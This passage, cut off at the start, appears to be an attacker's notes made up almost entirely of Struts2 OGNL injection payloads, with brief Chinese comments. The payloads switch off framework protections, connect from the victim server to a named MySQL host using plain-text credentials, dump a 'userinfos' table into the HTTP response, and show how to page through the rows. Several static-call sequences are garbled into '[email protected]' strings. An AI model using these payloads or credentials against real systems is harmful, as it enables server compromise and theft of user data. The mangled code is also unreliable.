protected]@getConnection(\43req.getParameter(%22url%22)\u002c\43req.getParameter(%22user%22)\u002c\43req.getParameter(%22psw%22))')(d))&(i45)(('\43con.setCatalog(\43req.getParameter(%22db%22))')(d))&(i5)(('\43rs\75\43con.createStatement().executeQuery(\43req.getParameter(%22sql%22))')(d))&(i6)(('\43rs.next()')(d))&(i95)(('\43xman.getWriter().println(new\40java.lang.StringBuilder().append(\43rs.getString(1)%2b%22%22).append(%22%25%25%25%22).append(\43rs.getString(2)%2b%22%22).append(%22%25%25%25%22).append(\43rs.getString(3)%2b%22%22).append(%22%25%25%25%22).append(\43rs.getString(4)%2b%22%22).append(%22%25%25%25%22).append(\43rs.getString(5)%2b%22%22).append(%22%25%25%25%22).append(\43rs.getString(6)%2b%22%22).append(%22%25%25%25%22).append(\43rs.getString(7)%2b%22%22).append(%22%25%25%25%22).append(\43rs.getString(8)%2b%22%22).append(%22%25%25%25%22))')(d))&(i99)(('\43xman.getWriter().close()')(d))&db=shanxi&sql=select+*+from+userinfos&psw=123456&user=yaolanabc&clazz=com.mysql.jdbc.Driver&url=jdbc%3Amysql%3A%2F%2Fdb.abc.yaolan.com%2Fabc%3FuseUnicode%3Dtrue%26amp%3BcharacterEncoding%3DUTF-8 第2条,是\43rs.next()%2b\43rs.next() 2个 ('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\[email protected]@EMPTY_SET')(c))&(i1)(('\43req\[email protected]@getRequest()')(d))&(i2)(('\43xman\[email protected]@getResponse()')(d))&(i3)(('@java.lang.Class@forName(\43req.getParameter(%22clazz%22))')(d))&(i4)(('\43con\[email protected]@getConnection(\43req.getParameter(%22url%22)\u002c\43req.getParameter(%22user%22)\u002c\43req.getParameter(%22psw%22))')(d))&(i45)(('\43con.setCatalog(\43req.getParameter(%22db%22))')(d))&(i5)(('\43rs\75\43con.createStatement().executeQuery(\43req.getParameter(%22sql%22))')(d))&(i6)(('\43rs.next()%2b\43rs.next()')(d))&(i95)(('\43xman.getWriter().println(new\40java.lang.StringBuilder().append(\43rs.getString(1)%2b%22%22).append(%22%25%25%25%22).append(\43rs.getString(2)%2b%22%22).append(%22%25%25%25%22).append(\43rs.getString(3)%2b%22%22).append(%22%25%25%25%22).append(\43rs.getString(4)%2b%22%22).append(%22%25%25%25%22).append(\43rs.getString(5)%2b%22%22).append(%22%25%25%25%22).append(\43rs.getString(6)%2b%22%22).append(%22%25%25%25%22).append(\43rs.getString(7)%2b%22%22).append(%22%25%25%25%22).append(\43rs.getString(8)%2b%22%22).append(%22%25%25%25%22))')(d))&(i99)(('\43xman.getWriter().close()')(d))&db=shanxi&sql=select+*+from+userinfos&psw=123456&user=yaolanabc&clazz=com.mysql.jdbc.Driver&url=jdbc%3Amysql%3A%2F%2Fdb.abc.yaolan.com%2Fabc%3FuseUnicode%3Dtrue%26amp%3BcharacterEncoding%3DUTF-8 第3个是 3个。 第4个是 4个。\43rs.next()%2b\43rs.next()%2b\43rs.next()%2b\43rs.next() 貌似最多只能200多个。